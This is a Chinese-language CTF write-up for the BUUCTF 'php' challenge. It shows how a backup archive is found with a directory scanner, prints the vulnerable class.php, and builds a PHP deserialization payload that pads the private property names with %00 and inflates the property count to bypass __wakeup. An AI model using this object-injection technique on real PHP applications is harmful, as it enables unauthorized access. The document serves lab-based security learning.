buuctf_php

2021-08-08

buuctf_php

在这里插入图片描述
我们来看下这道题,打开后有提示备份文件,对于备份文件我们可以使用御剑扫描后台目录
在这里插入图片描述
下载这个www.zip后发现
在这里插入图片描述
有这些文件,首先打开flag.php,发现不是我们想要的flag,所以我们打开class.php,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

首先我们注意关于username和password都是private,这个在下面的解答中会用到
在这里插入图片描述
然后打开index.php观察这个代码,由unserialize()知涉及反序列化,再打开class.php
在这里插入图片描述
我们可以知道只有username为admin时且password为100时,才会输出flag
而反序列化后调用_wakeup会直接覆盖输入的用户名。一个简单的办法是直接在class下面创建一个对象然后序列化。由此我们可以构造playload

1
2
3
$a= new Name('admin',100);
$b= serialize($a);
var_dump($b);

O:4:”Name”:2:{s:14:”Nameusername”;s:5:”admin”;s:14:”Namepassword”;i:100;}
此时我们需要注意两个点,一个是private属性序列化:%00类名%00成员名,所有要在Name、username、以及password前面加%00,另一个是关于_wakeup函数,因为要绕过wakeup,把Name后的数字改成3,**当反序列化时,若属性个数大于真实属性个数时,则会跳过__wakeup()**,本题得解
在这里插入图片描述